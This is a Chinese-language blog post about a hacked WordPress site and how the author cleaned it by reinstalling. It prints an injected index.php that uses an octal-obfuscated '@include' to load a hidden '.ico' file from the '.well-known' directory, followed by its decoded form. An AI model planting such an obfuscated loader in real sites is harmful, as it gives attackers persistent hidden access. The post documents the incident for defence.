2019年9月9日 星期一

wordpass 網站中木馬 全紀錄一招搞定

HTML首頁index.html 一直遭到修改index.html.bak.bak又新增一個index.php檔案
檔案內容:
<?php
/*58322*/

@include "\057ho\155e1\057se\145de\162ac\057pu\142li\143_h\164ml\057ih\0719/\056we\154l-\153no\167n/\141cm\145-c\150al\154en\147e/\05643\142d4\064a6\056ic\157";

/*58322*/
echo @file_get_contents('index.html.bak.bak');

使用 在線PHP和Javascript解碼器


Decrypted code:
@include "/home1/seederac/public_html/ih99/.well-known/acme-challenge/.43bd44a6.ico";

echo @file_get_contents('index.html.bak.bak');


.43bd44a6.ico";遭放置了這個檔案,主要是連結而不破壞網站,最討厭是改了隔天又來,一直來來覆覆 

而且連Google ads廣告也出現:
Google 廣告客戶您好:
在此通知您有一或多個關鍵字遭到拒登;在您配合政策修正廣告或關鍵字前,都無法在 Google、搜尋夥伴或多媒體廣告聯播網刊登位置上放送廣告。
如果您認為這項處置是誤判,Google 小組會全力協助您儘快讓廣告恢復放送。請見下方來了解廣告或關鍵字遭拒登的原因,並到問題報告中查看遭拒登的廣告或關鍵字,以及可以採取哪些方式來解決問題 (如果有適用做法的話)。


修改網這一個個查找是否有植入木馬與奇怪的編碼,找了幾天還是找不出原因,那就來個大殺招,整站刪除,先前準備作業,當然是備份,再來把wordpress所有插件全部清除備份wp-config-.php這個是設定檔相當重要再把怖景管所有檔案清除上傳全新wordpress5.23中文版wp-config-.php上傳進入後台管理重設怖景主題網站恢復OK
觀察幾天看是否還有其他問題~收工

有其他更好方式再底下提供留言












沒有留言:

張貼留言